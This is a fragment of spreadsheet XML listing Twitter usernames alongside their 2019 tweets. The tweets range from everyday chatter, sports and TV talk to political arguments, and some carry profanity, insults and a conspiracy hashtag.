    <t>Poemwa_Leezve</t>
  </si>
  <si>
    <t>New Women TS66 Tan Black Riding Knee High Boots sz 5 to 11 ( 4745 Watch Count ) https://t.co/btIl1XS4d0</t>
  </si>
  <si>
    <t>aislingwalsh0</t>
  </si>
  <si>
    <t>Greg and amber😍😍😍</t>
  </si>
  <si>
    <t>Skookworks</t>
  </si>
  <si>
    <t>July the 23rd, 2019 https://t.co/u75cRy1yz6 https://t.co/OOaak91M3X</t>
  </si>
  <si>
    <t>sugarmamajay</t>
  </si>
  <si>
    <t>I wanted Thursday night free so I can see where the night takes me but now there’s so much i wanna do it’s driving me 🥜</t>
  </si>
  <si>
    <t>sheisLa_</t>
  </si>
  <si>
    <t>@taywash_ Once cuffing season start, yeah. The quickest way to be cuffed is to be with a lesbian.</t>
  </si>
  <si>
    <t>gen8555</t>
  </si>
  <si>
    <t>@rikajougasakii 765 pro producer-san is my fav. Overall good guy who reflects the original game well. I wanna play idolm@ster 2 again lol</t>
  </si>
  <si>
    <t>AiStudioOnline</t>
  </si>
  <si>
    <t>I am going to walking &amp; find all of them in this fall/autumn 🏃‍♀️😎👻🎶 https://t.co/0WRfYjzKtU</t>
  </si>
  <si>
    <t>UniFFXIV</t>
  </si>
  <si>
    <t>New hair for the raid 💚 raid starts tomorrow for me. Good luck everyone. #GPOSERS https://t.co/DPGhfYvGeE</t>
  </si>
  <si>
    <t>forthafirsttime</t>
  </si>
  <si>
    <t>the tax hit at 4am im UP baby lets pay this tick off!!!!!</t>
  </si>
  <si>
    <t>KingofQueens13</t>
  </si>
  <si>
    <t>Trying to sort out Sunday's outfit so that my m/u artist has an idea. lol Ugh!</t>
  </si>
  <si>
    <t>sysex0xf7</t>
  </si>
  <si>
    <t>No internet once again (surprise, surprise) and usual canned replies from @virginmedia and their appalling #CustomerService. Booked an engineer (again), will waste a day for someone to come n look at my hub n then disappear to check the cabinet #worstservice #ISP</t>
  </si>
  <si>
    <t>PatHartman_</t>
  </si>
  <si>
    <t>@tech_52 There are at least 5 words in here that the vocabulary-challenged orange blob is unfamiliar with: constitutional moral duty constituents neighbors I doubt that anyone in his immediate circle will volunteer to translate. They don't know those words either.</t>
  </si>
  <si>
    <t>itseffinjas</t>
  </si>
  <si>
    <t>Ok I have shopped til my eyes started burning it is time for me to be in beddddddddd 🤦🏻‍♀️</t>
  </si>
  <si>
    <t>_GianniTsunami</t>
  </si>
  <si>
    <t>@hoopgod_will Got 4 happy go lucky idiot centered shows and a murder fest lmao</t>
  </si>
  <si>
    <t>BigJebBos</t>
  </si>
  <si>
    <t>Mueller’s testimony is breads and circuses for DC political chronics. I hope you enjoyed the lions tearing at flesh. Are you not amused?</t>
  </si>
  <si>
    <t>BretMaverick777</t>
  </si>
  <si>
    <t>@rexthetvterrier Rex, sic balls. ....Okay, unfair....I realize there's no balls there to sic. Maybe the bonespurs in his ankle...?</t>
  </si>
  <si>
    <t>BryanFarley11</t>
  </si>
  <si>
    <t>@RealMNchiefsfan Big and fast</t>
  </si>
  <si>
    <t>heyitssjenn</t>
  </si>
  <si>
    <t>@dumbitchmiranda Me to all my friends who I haven’t come out too thinking I’m going to end up with a bf 💀</t>
  </si>
  <si>
    <t>rebeccakayj</t>
  </si>
  <si>
    <t>@EARTHDOGBB Wednesday too! Actually this whole fucking season is boring af. #BB producers to fans: https://t.co/EU7KcLihqC</t>
  </si>
  <si>
    <t>TWFKAMES1</t>
  </si>
  <si>
    <t>A quick message to @realDonaldTrump #GilroyGarlicFestival ANOTHER mass shooting. @IOWGarlicFest (Britain) Please do not disturb the Red Squirrels. ANOTHER MASS SHOOTING DONNY. Who is to blame?</t>
  </si>
  <si>
    <t>WSAU</t>
  </si>
  <si>
    <t>UPDATE: The shooter who killed 5 in Chippewa County this weekend has been identified, along with his victims: https://t.co/ejaxkUPmAb</t>
  </si>
  <si>
    <t>Sinky65Beaky68</t>
  </si>
  <si>
    <t>@SoupaSokaGaming The countdown is most certainly on. It’s dragging worse than Christmas morning.</t>
  </si>
  <si>
    <t>minardifan</t>
  </si>
  <si>
    <t>@TheRanno @sari1967 It is spotting with rain on the platform in cardiff still warm though</t>
  </si>
  <si>
    <t>PotCpa</t>
  </si>
  <si>
    <t>PS Love the packaged apples @wawa</t>
  </si>
  <si>
    <t>ItsJewelDuhh</t>
  </si>
  <si>
    <t>@Gorgeous_ceecee 😂😂😂I think I’m going sober for a while</t>
  </si>
  <si>
    <t>NateAgapi</t>
  </si>
  <si>
    <t>What's really real anyway A puff of smoke and a say A red dawn on a new day But not yesterday Which is still technically today Not on my watch I will keep you alive By singing healing songs For seven hours Or so So... Don't go</t>
  </si>
  <si>
    <t>VeoliaUK</t>
  </si>
  <si>
    <t>@NoelParkN22 @NoelParkLabour Appreciate the information! This has been reported and logged to be cleared under Ref. 6525331 Thanks. ^TB</t>
  </si>
  <si>
    <t>EscoBlades</t>
  </si>
  <si>
    <t>@DaveOshry @OldManKaidan The one i had in Montreal had rounded edges and OMG what a godsend</t>
  </si>
  <si>
    <t>weebriel</t>
  </si>
  <si>
    <t>i might just get drunk and play tft for 8 hours every night after work for the foreseeable future</t>
  </si>
  <si>
    <t>MainTanay</t>
  </si>
  <si>
    <t>@_YoungGoat Go to bed.</t>
  </si>
  <si>
    <t>2makeupjunkie</t>
  </si>
  <si>
    <t>Heeeyyyyy, guess what I forgot?! 🙄🙄🙄🙄🙄 Before pictures WILL be the death of me. But its ok, just look at this beautiful fluff 😍 . . . . . . . . #makeupjunkie #motd #makeup #esthetician #esty #skincare #daily… https://t.co/tHlZr9jtJO</t>
  </si>
  <si>
    <t>LetsTalkCrops</t>
  </si>
  <si>
    <t>Here are the #Blackgrass Task Force team recommendations to help Paul Drinkwater tackle his farm's #blackgrass pressure. Keep an eye for more of our videos!</t>
  </si>
  <si>
    <t>bluesky76251</t>
  </si>
  <si>
    <t>@KamalaHarris This will no doubt cause the incarceration of a vast many African Americans, far more than you've already been directly responsible for with your history #Racist</t>
  </si>
  <si>
    <t>PepinLachance</t>
  </si>
  <si>
    <t>@mos4icos @QasimRashid @ICEgov @GOP The @GOP was litterally compromised by a foreign intelligence service. When the Kremlin stole the @RNC emails, and your concern trolling over some tired ass bullshit. Our very foundational thing is elections. The government has no mandate without legitimate elections.</t>
  </si>
  <si>
    <t>thunderbolt5523</t>
  </si>
  <si>
    <t>@gordy_shanks @Mihero So, just another day in the White House aka Crazy Town</t>
  </si>
  <si>
    <t>ShawnCosgrove1</t>
  </si>
  <si>
    <t>Sat Aug 31 I'm hosting a big night at the Western Star Hotel , Dubbo to help Michael Hackett who had a bad race fall. Top jockeys NRL stars! Bring ya money...and go home without it to help Mick!</t>
  </si>
  <si>
    <t>OfficialMisty80</t>
  </si>
  <si>
    <t>@IndieGeniusMus1 @THEUVBAND @Dantheuvband @JamieTHEUVBAND @UV_Strangler We leave behind two great EPs and a wealth of great live footage :)</t>
  </si>
  <si>
    <t>mandychele</t>
  </si>
  <si>
    <t>Billy and Mj better close it out🔥🔥</t>
  </si>
  <si>
    <t>vivisected</t>
  </si>
  <si>
    <t>@RK4257 Lol ok. Well my pal is IT and his wife is a web dev so they’re firmly in middle class so tells you how much private insurance works for the average person. it works for the wealthy, that’s it.</t>
  </si>
  <si>
    <t>Cavi712</t>
  </si>
  <si>
    <t>@FredTJoseph Also, keep your hands to yourself. That grab a woman by her wrist or elbow move to get her attention when she's purposely ignoring move isn't it and ill probably leave you with an injured wrist or arm.</t>
  </si>
  <si>
    <t>djsweendawg</t>
  </si>
  <si>
    <t>@tonegodspeed Awe man get up wit my boy @Deeexblack he go crazy on p4 i wish that shit was cross compatible</t>
  </si>
  <si>
    <t>Crondall4Europe</t>
  </si>
  <si>
    <t>So @ranil, how many children does Doris have? Are we allowed to know now? Asking on behalf of the national interest.</t>
  </si>
  <si>
    <t>Zexyz</t>
  </si>
  <si>
    <t>@LasciviousFox Yes you may. Thank you for asking and SFW respect. Please tag.</t>
  </si>
  <si>
    <t>LizLoza_FF</t>
  </si>
  <si>
    <t>@eorvieto I’m not a Leo (living that Libra/Scorpio cusp life), but the happy + confident AF vibes of #leoseason have me ✨✨✨</t>
  </si>
  <si>
    <t>JamieNi68586232</t>
  </si>
  <si>
    <t>@BalanceOverBias @RepCummings That is so true Maryland used to be a beautiful state to go through years ago when I was driving I'm retired now I wouldn't take a truck through there if they paid me</t>
  </si>
  <si>
    <t>CONSCIOUSBEATS8</t>
  </si>
  <si>
    <t>“I am tough for a reason and it is to fucking destroy the music. I dance hard.”―Hannah Moskowitz</t>
  </si>
  <si>
    <t>hoperight_here</t>
  </si>
  <si>
    <t>6 days to go. 😫</t>
  </si>
  <si>
    <t>spinalinjuries</t>
  </si>
  <si>
    <t>Our seventh awards ceremony took place on Thursday 11 July 2019 at @WilliamsRacing in Oxfordshire. This year we were delighted to welcome our Patron, HRH The Princess Royal at the awards ceremony. Congratulations to all our winners! https://t.co/xgQw6cD11U #RebuildingLives2019</t>
  </si>
  <si>
    <t>lajollagirl777</t>
  </si>
  <si>
    <t>@ConservaMomUSA @WolvesUnited3 @BernieSanders She doesn't care that employers will have to cut staff or hours if required to raise wages to $20 hr. We would all love to make more money, but it is more important to have a job than to get fired or lose hours at our current job. This does not affect her, so she could care less!</t>
  </si>
  <si>
    <t>KennedyRuss423</t>
  </si>
  <si>
    <t>#DemDebate The voice of reason is what will change the channel Thank you @PeteButtigieg for not interrupting, for not ignoring debate rules, and for not talking over others. Respect counts! Be like Pete!</t>
  </si>
  <si>
    <t>cookiedeaux_</t>
  </si>
  <si>
    <t>@regulationhotie girl get some caramel sauce and call it a day okay lol</t>
  </si>
  <si>
    <t>ayejscott</t>
  </si>
  <si>
    <t>saving myself for chantel jeffries fuck you hoes</t>
  </si>
  <si>
    <t>DontGetYapped</t>
  </si>
  <si>
    <t>@BIGD088 @Marcus_Mosher And your qb doesn’t need the rb? You cowboys fans are special</t>
  </si>
  <si>
    <t>NAM_London</t>
  </si>
  <si>
    <t>#TANKCHALLENGE leaderboard looking strong But are we really sposed to believe you did it in 15 seconds, "Brando" We suspect there may be some cheating going on https://t.co/5km9CeYMPu</t>
  </si>
  <si>
    <t>2grainsofsalt</t>
  </si>
  <si>
    <t>@cjane87 So congressman, what plays? "1st like with congress, I'd tell them to get things done, go long, pass them the ball, get out of bounds. Then it's up to me to run things from there, setting up a Hail Mary from the 40. And that's when we will go long &amp; pass for Medicare for All!"</t>
  </si>
  <si>
    <t>pothen</t>
  </si>
  <si>
    <t>@pixelprotectors You'll have plenty of time to answer, because I've got to get back to work for a few hours.</t>
  </si>
  <si>
    <t>SemiFakeGods</t>
  </si>
  <si>
    <t>@humanworkplace @jojoefs I was mortified to learn how underpaid I was when I left my last job. Even better? Employers who solicited info about my previous salary seemed to use that information as a way to dismiss my skills and expertise. If I knew more I would have been paid more was the logic.</t>
  </si>
  <si>
    <t>amayakitt</t>
  </si>
  <si>
    <t>@mazarinno im having some big brain thoughts tw drug mention in the image via text (@mazarinno) https://t.co/cY2nTKQzgq</t>
  </si>
  <si>
    <t>MakeupByMelMua</t>
  </si>
  <si>
    <t>Alien 👽 pig 🐷 lol If you watched my live you get the whole alien pig thing lol 😂😂 Sorry I didn’t paint my whole body. I was too lazy, and this paint stuff is hard to get off. _____ Cc beauty paint palette @jamescharles x @morphebrushes Artistry p… https://t.co/PJQ4itrjKv https://t.co/Yl9z6K7WZA</t>
  </si>
  <si>
    <t>deadboltwillie</t>
  </si>
  <si>
    <t>11 days until BH 90210...the countdown is on https://t.co/Qcecbfqwe1</t>
  </si>
  <si>
    <t>ABHabsFan30</t>
  </si>
  <si>
    <t>@msserv_joann I read the tweet long i was up early helping my roommate with her paper route</t>
  </si>
  <si>
    <t>natasha_rojaass</t>
  </si>
  <si>
    <t>@TuckerBarbz lmaoo can I just see the votes</t>
  </si>
  <si>
    <t>NWSLittleRock</t>
  </si>
  <si>
    <t>On this day in 1996, temperatures reached near 100 in central and northern Arkansas. Severe storms explosively developed. In Little Rock, winds from a collapsing thunderstorm blew down the left field wall at Ray Winder Field. #arwx #wxhistory https://t.co/YtkaovGwLD</t>
  </si>
  <si>
    <t>Cheryl1betofan</t>
  </si>
  <si>
    <t>@hierophantess @vanisles I know it irks me. Can't say what I really want , but I get called a slut by a MAGA and that's okay ? 🤔</t>
  </si>
  <si>
    <t>dee811dee</t>
  </si>
  <si>
    <t>That kiss scene better not happen. Mohammed can’t even say ONE WORD and you think he’ll plant a kiss on Sam 😂😂😂? #druck https://t.co/EHAeOh7F8F</t>
  </si>
  <si>
    <t>styleforarigg</t>
  </si>
  <si>
    <t>i’m bored, i don’t want to sleep, but u know... 3:25am here so i have to</t>
  </si>
  <si>
    <t>_sawcy</t>
  </si>
  <si>
    <t>@BLKMANSCHESS1 @TMS2k @2kCompGames Put bread up?👀</t>
  </si>
  <si>
    <t>surfs_tony</t>
  </si>
  <si>
    <t>@KamalaHarris hi @KamalaHarris call @fbi and have them do their normal, everyday, ordinary job, sometime this century. i know @fbi has a ton of @nazi mother duckers to worry about first. killing me. t</t>
  </si>
  <si>
    <t>Streamcast_</t>
  </si>
  <si>
    <t>A remarkable feat for the fighting game powerhouse and with this game in the lineup for #Evo2019 you can bet this game's revelancy won't be dying any time soon</t>
  </si>
  <si>
    <t>VivigXO</t>
  </si>
  <si>
    <t>People that say Friends isn’t a good show grew up with cable</t>
  </si>
  <si>
    <t>tinkerbell0672</t>
  </si>
  <si>
    <t>@sara40853717 I get like that, bloody nightmare. It's like "body c'mon sort the thermostat out!" 😣😂 And don't get me started on the hot flushes...</t>
  </si>
  <si>
    <t>ThugWookie</t>
  </si>
  <si>
    <t>Oh dear confirmed then, hide and seek campfest then it is. smh #ModernWarfare @RealThunder402 @MrEightThoughts @F1sT @JiveTurkey600 https://t.co/SnkBA8mJ8S</t>
  </si>
  <si>
    <t>HazoAG21</t>
  </si>
  <si>
    <t>Moise Kean £29m £50,000 a week No buy back clause You were beginning to doubt him? https://t.co/D4vjhkB1Ev</t>
  </si>
  <si>
    <t>Artpost</t>
  </si>
  <si>
    <t>Agile Data Sites Partners with Lincoln Rackhouse to Acquire Bytegrid’s Former Assets and Clients and Expand its Data… https://t.co/dCLWR8fBTx via @artpost</t>
  </si>
  <si>
    <t>eva_hembree</t>
  </si>
  <si>
    <t>@TrumpLadyFran @KMGGaryde She just came out week before last and said she was very proud of her district. Yes let's put her on blast as well. So she can call all of us racist.</t>
  </si>
  <si>
    <t>ember75</t>
  </si>
  <si>
    <t>@crapolatombola ps.. glad to see yer in a good mood. *thumbs up *</t>
  </si>
  <si>
    <t>DGoldenmind</t>
  </si>
  <si>
    <t>Uplay 2020 : The Gold Championship group. https://t.co/3YdqEHoTJn</t>
  </si>
  <si>
    <t>EricSpurgetis18</t>
  </si>
  <si>
    <t>Happy birthday to one of the bros @SageRoberson23 Hope it was a good one man. Thanks for always being a real one ✊🏼❤️</t>
  </si>
  <si>
    <t>bjdickmayhew</t>
  </si>
  <si>
    <t>@tkarmarkar89 This draft is not incredibly bad; bad, but well within tolerable limits of bad. Now I need to run it by a co-author and fellow data wrangler to make sure that I am not crazy. #PROGRESS</t>
  </si>
  <si>
    <t>dontjustlivefly</t>
  </si>
  <si>
    <t>@wwiibarnes It’s fine, autocorrect had already kinda ruined the serious moment. “yard” WHAT EVEN</t>
  </si>
  <si>
    <t>keithgraham91</t>
  </si>
  <si>
    <t>I just earned the 'Cheers to Independent U.S. Craft Breweries (Level 17)' badge on @untappd! https://t.co/HztL328OdJ</t>
  </si>
  <si>
    <t>RevoluShane7</t>
  </si>
  <si>
    <t>@Dr_Blick I respect the french league as the 5th or 6th best league in the world</t>
  </si>
  <si>
    <t>saramuse</t>
  </si>
  <si>
    <t>@AnikaScott1 I think you found a book my husband and I would both love! He's a huge Le Carre fan, I love Atwood and Dostoevsky, and Soviet spy stories are our favorites. Tell me you've seen Atomic Blonde!</t>
  </si>
  <si>
    <t>ShoulderLondon</t>
  </si>
  <si>
    <t>The #NHS is all about diversity. Meet our pest control hawks @LNWH_NHS ! #LNWHOpenDay https://t.co/SVot2HJXCI</t>
  </si>
  <si>
    <t>TheEvanMcLean</t>
  </si>
  <si>
    <t>@IntelDoge @CallofDuty Maybe it’ll actually be good unlike the last several</t>
  </si>
  <si>
    <t>StellaFin5</t>
  </si>
  <si>
    <t>@bw3winggirl Can you please follow me back? SO i'll be able to dm you!</t>
  </si>
  <si>
    <t>EMPIREDinna</t>
  </si>
  <si>
    <t>IT'S THE FINAL DAY OF SEASON 9!!! Let us know if you need a season umbrella!! Stop in and say hi :) https://t.co/hRxtOXv4rD #Fortnite #TwitchTV #TwitchAffiliate #SupportSmallStreamers #VsTheWorld</t>
  </si>
  <si>
    <t>BlackPhysicists</t>
  </si>
  <si>
    <t>The latest Twitter Astronomy Observer! https://t.co/DYuk0I8yIm Thanks to @NelsonInsLLC @space_is_fizzy @Kansasgirlinca #space #science</t>
  </si>
  <si>
    <t>JimLeitrim</t>
  </si>
  <si>
    <t>@Malin_Bob Bloody hell👍👍👍👍, i don't know is the honest answer.</t>
  </si>
  <si>
    <t>michaelcoop27</t>
  </si>
  <si>
    <t>@BlakeW47 @mason_mccreary @Ken_Rosenthal They were all drafted by the dodgers. We didn’t trade for these guys. The bullpen is our problem and they don’t understand that. Our front office didn’t have to make a trade deal for these guys</t>
  </si>
  <si>
    <t>Bexofeasttex</t>
  </si>
  <si>
    <t>Follow the money. #QSentMe Video of Red Cross Smuggling Cash Is Unrelated to the FREEDOM Stringer in Previous Drop https://t.co/52NEBPPoF0 #Qanon #WeAreTheNewsNow #FactsMatter #WWG1WGA #WakeUpAmerica #UnitedNotDivided #SaveAmerica #GreatAwakening</t>
  </si>
  <si>
    <t>mabz_anam</t>
  </si>
  <si>
    <t>"There is not an animal that lives on the earth, nor a being that flies on its wings, but they form communities like you. Nothing have we omitted from the Book, and they all shall be gathered to their Lord in the end" (Quran 6:38).</t>
  </si>
  <si>
    <t>VB_Spoon</t>
  </si>
  <si>
    <t>Some clean art from the #baybombs car show last weekend at Elk’s https://t.co/R3ImGn2fok</t>
  </si>
  <si>
    <t>MikeHoxard</t>
  </si>
  <si>
    <t>@Hattrick011 She needs to spend a bit more time in the refectory and a little less time with her books 😉</t>
  </si>
  <si>
    <t>@nino_eric Thanks for opting in. We'll remind you when the #GermanGP is about to start. #F1 Reply #OptOut to cancel https://t.co/SWNxOcvfqZ</t>
  </si>
  <si>
    <t>LukeBosse24</t>
  </si>
  <si>
    <t>When your wife has had Bachelorette/The Hills on a 48-hour loop https://t.co/Kw3p19z8tm</t>
  </si>
  <si>
    <t>LostBrosTweets</t>
  </si>
  <si>
    <t>@Lyssa_Madds yay!! love that for u!</t>
  </si>
  <si>
    <t>angelawomacksx</t>
  </si>
  <si>
    <t>[Download] EPUB Duck for President (A Click Clack Book) =&gt; https://t.co/R8wpL8ypTB</t>
  </si>
  <si>
    <t>jb_nagi</t>
  </si>
  <si>
    <t>Don’t ever switch to @sprint</t>
  </si>
  <si>
    <t>sphericaltime</t>
  </si>
  <si>
    <t>@dreamygirl202 @EDM17503975 @RadFemme74 @ShieldingC @Nespresso821 @YuriKitten @EmilyBanting1 @lbathwaterblues @Eristae @mcglk @Ian99572584 @whale_sister @9BillionTigers @sextoyspolitics @H_L_Smith_ @clitemnestra6 @CJTheMoonGirl @michellen12344 @Sarah05009170 @aaaah_no @red_mcwilliams @amalgamary @sarah_vesey @MxARivelin @eunarthabossamy @my_real_name @thatBluntBytch @arthur_affect @CubWill @GafaKevina @LogicalMarcus @MRKHvoice @Demotivatrix @SothernCharm @SocialistLeona @RealFeminist4 @sarion_gamer @HeidiBrave @ApeshitPolitics @christinajoy67 @ravelruh @salspua @bettytastic @Michell29077097 @Women_Exist @MalachiteTiger @Jewthulhu @dwarfland @MeanwhileIPaint @BonSt80612960 There are different contexts in which we can ask if someone is a woman. Is she legally? Yes. Genetically? No. Culturally? Yes. Biologically? Well, it’s complicated. For the majority of her interactions she’s a woman.</t>
  </si>
  <si>
    <t>Diggiti</t>
  </si>
  <si>
    <t>@WSJ He thinks he is hurting black people .. jokes on you jack . I Dare You to do it</t>
  </si>
  <si>
    <t>NewMediaVegas</t>
  </si>
  <si>
    <t>The latest The New Media Vegas, LLC Daily! https://t.co/cfwPdUVmXF Thanks to @VegasNews @LasVegasSun #stressmanagement #productivity</t>
  </si>
  <si>
    <t>BabyBoomerWritr</t>
  </si>
  <si>
    <t>@rkbroder Perhaps true for some men, but younger men fear the reputational risk of being falsely accused of impropriety. Few will meet interviewees behind closed doors.</t>
  </si>
  <si>
    <t>OwenThompson</t>
  </si>
  <si>
    <t>The latest Scottish Local Government Daily! https://t.co/91ClRs3LcK Thanks to @GlasgowCC @DundeeCouncil @Aberdeenshire #20mph #communitymeetings</t>
  </si>
  <si>
    <t>DominicPiper1</t>
  </si>
  <si>
    <t>'Maybe being a rich man's daughter put her in the path of the biggest tossers and users in the country and they used her and sucked her dry like a bunch of over privileged vampires.' https://t.co/gfjn0nlxF2 #CrimeFiction https://t.co/UKLULk4b3l</t>
  </si>
  <si>
    <t>CashhFinesse</t>
  </si>
  <si>
    <t>Life becomes a temporary oasis today. Saunter through your nei... More for Taurus https://t.co/Rl5oBS1u7r</t>
  </si>
  <si>
    <t>O2</t>
  </si>
  <si>
    <t>@shemsational Hi there 😞 Your credit rating isn't necessarily something that's taken into consideration when applying for credit. Many more things are considered. If you'd like us to look into this further, please email creditfilereferrals@o2.com.</t>
  </si>
  <si>
    <t>hkmissjessica</t>
  </si>
  <si>
    <t>The wisest thing he ever did in his life. #femdom #mistress #dominatrix #bdsm #domme #chastity #cuckold #sissy #sissyslave #FemaleSupremacy #humiliation #dominatrix #hkmistress #domination #dommelife #pindick @Sissy__Paypig @hongkongdomina @AsiaMistress @MarketingBDSM @FemdomWRLD https://t.co/jcw6FYqFjJ</t>
  </si>
  <si>
    <t>J4ck0f411Tr4d3s</t>
  </si>
  <si>
    <t>@WalshFreedom You've got no evidence to back that up, bitch</t>
  </si>
  <si>
    <t>SomeGuyNamedKai</t>
  </si>
  <si>
    <t>@Ben_Tarrant @katosman Now to figure out how to mod the Hello Kitty flashlight onto the Switch version of DOOM 3...</t>
  </si>
  <si>
    <t>CrisisOmega</t>
  </si>
  <si>
    <t>@QTDeerGirl requested and I quote "big honkin aeromorph dongggg" and thus I provided https://t.co/U9npwA3Ljc</t>
  </si>
  <si>
    <t>GemberlingLynd</t>
  </si>
  <si>
    <t>@realDonaldTrump You sound scared. You review your fairwell address yet? It’s customary to make a few remarks to wh cooks and cleaning staff. You know the little people</t>
  </si>
  <si>
    <t>fegzy3</t>
  </si>
  <si>
    <t>Me gig jeans got ripped by the arse hole! Must of been the deadly farts I was letting out after a #whetherspoons had to borrow me mates spares😂 #ffs https://t.co/IINewIpmSH</t>
  </si>
  <si>
    <t>NewnewDenise</t>
  </si>
  <si>
    <t>@ChrisLoville Ohhhh if you want some crab legs, go to Kran Queenz, it’s worth it</t>
  </si>
  <si>
    <t>eyeswideshut75</t>
  </si>
  <si>
    <t>@SammyJBenn trying to think of a cricket-based pun... were you bowled over?</t>
  </si>
  <si>
    <t>jjwills2</t>
  </si>
  <si>
    <t>@mmmadcccow I had a man I worked with very old school trapper made his wife a mink coat out of them, he usually sold the fur but he made her a coat they worth some money</t>
  </si>
  <si>
    <t>i_am_kambo</t>
  </si>
  <si>
    <t>@CogginToboggan Can always drop a chief to really get the point across 🤷‍♀️</t>
  </si>
  <si>
    <t>___LAG___</t>
  </si>
  <si>
    <t>@MeesterAl Things are way way better thank god! And sometimes the music system works for me but not this time. You could be right, it is very strange weather today</t>
  </si>
  <si>
    <t>JohnIsaBadMan</t>
  </si>
  <si>
    <t>it’s 2019 and people still retweeting those tweets of someone who claims they won the lottery and gone give out money. y’all that desperate?</t>
  </si>
  <si>
    <t>StuKP</t>
  </si>
  <si>
    <t>@RideCannondale Any chance of a reply to this as time is pressing and I have a busy week? Given the gravity of the situation I'd have expected better and your silence is contemptible.</t>
  </si>
  <si>
    <t>moneymon228</t>
  </si>
  <si>
    <t>@therealnoliaG @TylaWeatherspo1 see .. she be trynna act up</t>
  </si>
  <si>
    <t>My_Mia_Mya</t>
  </si>
  <si>
    <t>To end homelessness, you must focus on the reasons people become homeless, one being systemic racism. Proud to have shared what we’re doing in CT to address racial inequities in housing and homelessness at #NAEH2019 #EndingHomelessness #CCEH #RacialEquity https://t.co/Nb6nHNu8mj</t>
  </si>
  <si>
    <t>quanta_shiro</t>
  </si>
  <si>
    <t>@mesfiner Dude talking about ppl being trash ... man your music is trash, I hit skip every time your music comes on. And first off, If they paved the way for independence even though I‘m in debt doesn’t mean ppl slave from them 🤡 እንታይ ዝበለ ጸገም እዮ ወደይ ... ጣውላ https://t.co/iNgMtjqO2Q</t>
  </si>
  <si>
    <t>demvri</t>
  </si>
  <si>
    <t>boy my scooter died on my ass lastnight had to buck another one 😂😂</t>
  </si>
  <si>
    <t>nycoutages</t>
  </si>
  <si>
    <t>FIXED: An escalator @ 125th St servicing Street To Mezzanine is in service</t>
  </si>
  <si>
    <t>rockomacleod</t>
  </si>
  <si>
    <t>- oh yeah, and don't fuck up and think you're registering "independent" but accidentally register for the "American Independent Party". You are looking for unaffiliated!</t>
  </si>
  <si>
    <t>AdamStockers</t>
  </si>
  <si>
    <t>@samclawrence I guess being in the lords for so long with next to life outside of politics must give you plenty of time on your hands to be able to come up with such crap</t>
  </si>
  <si>
    <t>VinceHerrera</t>
  </si>
  <si>
    <t>@OmarKelly So the players realize and own their mistake and go to the wall... that’s some nice accountability!</t>
  </si>
  <si>
    <t>elewis81</t>
  </si>
  <si>
    <t>@cjclutch22 oh, not to mention the dunk contest in warm ups. We get it, you're LeBron James and have money and power and influence, so you're allowed to do so. If his name was Lavar Ball, everyone would have a problem with it. This is just as dumb.</t>
  </si>
  <si>
    <t>jim_va_vet</t>
  </si>
  <si>
    <t>@MarkWarner @SenatorCollins What if a political party creates a BS dossier, and lies to a judge to get a FISA warrant. Then use it to have the campaign of a political foe (private citizen) "investigated" by our Gov. All to try and eliminate him. Do you think America should operate that way Mark?</t>
  </si>
  <si>
    <t>RaphDoesStuff</t>
  </si>
  <si>
    <t>Going to miss you @danharris80 , but @toomuchtuma acquitted himself well</t>
  </si>
  <si>
    <t>enterthewutang</t>
  </si>
  <si>
    <t>i’m trying to do this before the new episode tomorrow lmao</t>
  </si>
  <si>
    <t>nick215_Camera</t>
  </si>
  <si>
    <t>@niinasstyy go to bed lol</t>
  </si>
  <si>
    <t>elann57</t>
  </si>
  <si>
    <t>@Deeoshea @POTUS I find this report on Julian Assange very troubling, and do NOT understand how our Conservatives in power could allow this. He exposed Hillary and helped Trump win the election! Disturbing on all levels!</t>
  </si>
  <si>
    <t>KennyKing_Jr</t>
  </si>
  <si>
    <t>@OzoGrande You wanna keep thinking about players we traded abs passed up on?? Be my guest</t>
  </si>
  <si>
    <t>NeilBonnabel</t>
  </si>
  <si>
    <t>@MissCarley He is missed. So young and talented. His demons were stronger than his Guardian Angel...RIP.</t>
  </si>
  <si>
    <t>CreativeDeduct</t>
  </si>
  <si>
    <t>@NRP_lib the problem is how this was sold you don't ask the people what they want and then AFTER THE FACT say "hang on, we will vote on it in Parliament too". Then what if Parliament doesn't agree? that's where we are now. delivering Brexit is an executive matter, not a parliamentary one</t>
  </si>
  <si>
    <t>TX_Embassy</t>
  </si>
  <si>
    <t>@SpeakerPelosi 😂😂😂😂😂 You took pretty much the same oath, remember? Yet, here we are. 🙄</t>
  </si>
  <si>
    <t>cheyrantweets</t>
  </si>
  <si>
    <t>not to be a h8er but cream contouring like this is completely unnecessary and a waste of product unless you’re a drag queen</t>
  </si>
  <si>
    <t>sallyalexander</t>
  </si>
  <si>
    <t>@ashamphoto @coopes47 @LeeJack14 @_HawkRacing @FS3racing @SnettertonMSV @Pirelli @MSSPerformance @KTechSuspension Loving the stock 1000 class...great racing! 👌🏻</t>
  </si>
  <si>
    <t>JustMeMbMa</t>
  </si>
  <si>
    <t>@realDonaldTrump Ask our farmers @potus who they feel is holding all the cards. Your welfare style aid to them is not what they want - they want to sell their product that they worked hard to produce. Some American citizens will read and dig deeper than your tweets, unfortunately for you.</t>
  </si>
  <si>
    <t>cori_swars</t>
  </si>
  <si>
    <t>@twicebteam @JYPETWICE shot thru the heart #MGMAVOTE #MGMAVOTETWICE #TWICE @JYPETWICE</t>
  </si>
  <si>
    <t>whatlink</t>
  </si>
  <si>
    <t>@emilyhewertson Helluva a good reason not to vote. Women must learn to compete on equal terms. Labour the undemocractic Marxist party of misandrists.</t>
  </si>
  <si>
    <t>yoitsrich_</t>
  </si>
  <si>
    <t>Stop being the “go to” person for someone you can’t go to.</t>
  </si>
  <si>
    <t>MrsDeVonnaPayne</t>
  </si>
  <si>
    <t>My daughter really comes up with the most creative things. She literally took my dreadlock and wrap it around my comb and put a prince dress on it from her doll. Smh Idk to be mad or clap for her creativity lol</t>
  </si>
  <si>
    <t>BizzykidzAgency</t>
  </si>
  <si>
    <t>Parent Notice. Last minute admin work on https://t.co/7gaQtfAXJB this morning. Almost completed, apologies for any inconvenience. BKHQ</t>
  </si>
  <si>
    <t>dtboyd</t>
  </si>
  <si>
    <t>So while you are worth to FB $158/yr - but your face is worth $5 to Google? Google is gathering face data for Pixel 4 by giving people $5 https://t.co/UTj1FiI318?</t>
  </si>
  <si>
    <t>ALotAnxiety</t>
  </si>
  <si>
    <t>@antphrodite Can you see if jake and tana relationship is real or not? I'm not a fan of both of them but I'm just curious.</t>
  </si>
  <si>
    <t>Kellen_Fernetti</t>
  </si>
  <si>
    <t>Competitiveness will always FIND a WAY and Convenience will always FIND an EXCUSE! - Tom Crean</t>
  </si>
  <si>
